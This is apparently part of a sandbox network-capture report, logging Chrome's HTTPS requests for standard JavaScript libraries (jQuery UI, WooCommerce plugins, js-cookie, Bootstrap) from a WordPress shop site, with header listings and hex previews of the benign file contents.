                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 Edg/100.0.1185.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:49 UTC548INHTTP/1.1 504 Gateway Time-out
                                                                                                          Server: AkamaiGHost
                                                                                                          Mime-Version: 1.0
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 278
                                                                                                          Expires: Thu, 12 Dec 2024 11:58:48 GMT
                                                                                                          Date: Thu, 12 Dec 2024 11:58:48 GMT
                                                                                                          Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                                                                                                          Connection: close
                                                                                                          PMUSER_FORMAT_QS:
                                                                                                          X-CDN-TraceId: 0.afee2017.1734004708.3e3d2dd
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          2024-12-12 11:58:49 UTC278INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 37 26 23 34 36 3b 61 66 65 65 32 30 31 37 26 23 34 36 3b 31 37 33 34 30 30 34 37 30 38 26 23 34 36 3b 33 65 33 64 32 64 64 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 37 26 23 34 36 3b 61 66 65 65 32 30 31 37 26 23 34 36 3b 31 37 33 34 30 30 34 37 30 38 26 23 34 36 3b 33 65 33 64
                                                                                                          Data Ascii: <HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>An error occurred while processing your request.<p>Reference&#32;&#35;97&#46;afee2017&#46;1734004708&#46;3e3d2dd<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;97&#46;afee2017&#46;1734004708&#46;3e3d


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          87192.168.2.2449878147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC539OUTGET /wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:29 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 16 Jul 2024 22:20:29 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 880
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:29 UTC880INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 45 66 66 65 63 74 73 20 42 6c 69 6e 64 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66
                                                                                                          Data Ascii: /*! * jQuery UI Effects Blind 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?def


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          88192.168.2.2449879147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC734OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:29 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Mon, 06 Feb 2023 11:05:23 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 10721
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:29 UTC10721INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 72 65 66 72 65 73 68 20 63 61 72 74 20 77 68 65 6e 20 70 61 79 6d 65 6e 74 20 6d 65 74 68 6f 64 20 63 68 61 6e 67 65 64 0a 20 20 20 20 20 2a 2f 0a 20 20 20 20 69 66 20 28 61 77 64 72 5f 70 61 72 61 6d 73 2e 72 65 66 72 65 73 68 5f 6f 72 64 65 72 5f 72 65 76 69 65 77 20 3d 3d 20 27 31 27 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 27 63 68 61 6e 67 65 27 2c 20 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 70 61 79 6d 65 6e 74 5f 6d 65 74 68 6f 64 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 63 69 74 79 22 5d 2c 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 62 69 6c 6c 69 6e 67 5f 70 6f 73 74 63 6f 64 65 22 5d 27 2c 20 66
                                                                                                          Data Ascii: (function ($) { /** * refresh cart when payment method changed */ if (awdr_params.refresh_order_review == '1') { $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', f


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          89192.168.2.2449881147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC563OUTGET /wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:29 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 10 May 2024 09:02:59 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 2914
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:29 UTC2914INData Raw: 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 55 53 45 5f 45 46 46 45 43 54 53 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 55 53 45 5f 45 46 46 45 43 54 53 20 3d 20 27 30 27 3b 0a 7d 20 0a 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 53 50 45 45 44 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 53 50 45 45 44 20 3d 20 27 30 27 3b 0a 7d 20 0a 69 66 20 28 27 75 6e 64 65 66 69 6e 65 64 27 20 3d 3d 3d 20 74 79 70 65 6f 66 20 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 4f 50 54 49 4f 4e 53 29 20 7b 0a 09 42 47 5f 53 48 43 45 5f 54 4f 47 47 4c 45 5f 4f 50 54 49 4f 4e 53 20 3d 20 27 73 77 69 6e 67 27 3b 0a 7d 0a 69
                                                                                                          Data Ascii: if ('undefined' === typeof BG_SHCE_USE_EFFECTS) {BG_SHCE_USE_EFFECTS = '0';} if ('undefined' === typeof BG_SHCE_TOGGLE_SPEED) {BG_SHCE_TOGGLE_SPEED = '0';} if ('undefined' === typeof BG_SHCE_TOGGLE_OPTIONS) {BG_SHCE_TOGGLE_OPTIONS = 'swing';}i


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          90192.168.2.2449882147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC743OUTGET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.5.4 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:29 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Mon, 06 Feb 2023 11:05:23 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3053
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:29 UTC3053INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 2e 65 78 74 65 6e 64 28 7b 0a 20 20 20 20 20 20 20 20 41 64 76 61 6e 63 65 57 6f 6f 44 69 73 63 6f 75 6e 74 52 75 6c 65 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 64 75 63 74 5f 69 64 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 71 75 61 6e 74 69 74 79 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 69 6f 6e 73 3a 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 65 74 44 79 6e 61 6d 69 63 44 69 73 63 6f 75 6e 74 50 72 69 63 65 46 72 6f 6d 43 61 72 74 46 6f 72 6d 3a 20 66 75 6e 63 74 69 6f 6e 28 24
                                                                                                          Data Ascii: (function ($) { $.extend({ AdvanceWooDiscountRules: { form: null, product_id: null, quantity: 0, options: [], target: null, getDynamicDiscountPriceFromCartForm: function($


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          91192.168.2.2449883147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC580OUTGET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 9533
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC9533INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 62 6c 6f 63 6b 55 49 20 70 6c 75 67 69 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 37 30 2e 30 2d 32 30 31 34 2e 31 31 2e 32 33 0a 20 2a 20 52 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 37 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 3a 20 68 74 74 70 3a 2f 2f 6d 61 6c 73 75 70 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 62 6c 6f 63 6b 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 33 20 4d 2e 20 41 6c 73 75 70 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67
                                                                                                          Data Ascii: /*! * jQuery blockUI plugin * Version 2.70.0-2014.11.23 * Requires jQuery v1.7 or later * * Examples at: http://malsup.com/jquery/block/ * Copyright (c) 2007-2013 M. Alsup * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          92192.168.2.2449880147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:29 UTC570OUTGET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:29 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1834
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC1834INData Raw: 2f 2a 21 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 43 6f 6f 6b 69 65 20 76 32 2e 31 2e 34 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 73 2d 63 6f 6f 6b 69 65 2f 6a 73 2d 63 6f 6f 6b 69 65 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 36 2c 20 32 30 31 35 20 4b 6c 61 75 73 20 48 61 72 74 6c 20 26 20 46 61 67 6e 65 72 20 42 72 61 63 6b 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 6f 2c 74 3d 21 31 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 26 26 28 64 65 66 69 6e 65 28 65 29 2c 74 3d 21 30 29 2c 22 6f 62 6a 65 63 74
                                                                                                          Data Ascii: /*! * JavaScript Cookie v2.1.4 * https://github.com/js-cookie/js-cookie * * Copyright 2006, 2015 Klaus Hartl & Fagner Brack * Released under the MIT license */!function(e){var n,o,t=!1;"function"==typeof define&&define.amd&&(define(e),t=!0),"object


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          93192.168.2.2449886147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:30 UTC752OUTGET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.min.js?ver=4.3.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:30 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:30 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:31 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 58072
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:30 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                                                                                          Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                                                                                                          2024-12-12 11:58:30 UTC16384INData Raw: 65 6c 65 6d 65 6e 74 29 2c 67 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 61 64 64 43 6c 61 73 73 28 76 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 70 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 6d 74 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 2e 6c 65 6e 67 74 68 3b 69 66 28 30 3c 69 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 74 72 69 67 67 65 72 41 72 72 61 79 5b 6f 5d 2c 73 3d 5f 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 72 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 73 29 67 28 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 29 29 29 2e 68 61 73 43 6c 61 73
                                                                                                          Data Ascii: element),g(this._element).addClass(vt).removeClass(pt).removeClass(mt);var i=this._triggerArray.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=_.getSelectorFromElement(r);if(null!==s)g([].slice.call(document.querySelectorAll(s))).hasClas
                                                                                                          2024-12-12 11:58:30 UTC16384INData Raw: 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 3b 67 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 52 69 67 68 74 3d 6e 7c 7c 22 22 7d 2c 74 2e 5f 67 65 74 53 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 61 65 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 65 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 77 69 64 74 68 2d 74 2e 63 6c
                                                                                                          Data Ascii: padding-right");g(document.body).removeData("padding-right"),document.body.style.paddingRight=n||""},t._getScrollbarWidth=function(){var t=document.createElement("div");t.className=ae,document.body.appendChild(t);var e=t.getBoundingClientRect().width-t.cl
                                                                                                          2024-12-12 11:58:30 UTC8920INData Raw: 6c 69 63 65 2e 63 61 6c 6c 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 5f 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 3b 69 66 28 6e 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 65 29 7b 76 61 72 20 69 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 69 66 28 69 2e 77 69 64 74 68 7c 7c 69 2e 68 65 69 67 68 74 29 72 65 74 75 72 6e 5b 67 28 65 29 5b 6f 5d 28 29 2e 74 6f 70 2b 72 2c 6e 5d 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                          Data Ascii: lice.call(document.querySelectorAll(this._selector)).map(function(t){var e,n=_.getSelectorFromElement(t);if(n&&(e=document.querySelector(n)),e){var i=e.getBoundingClientRect();if(i.width||i.height)return[g(e)[o]().top+r,n]}return null}).filter(function(t)


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          94192.168.2.2449885147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
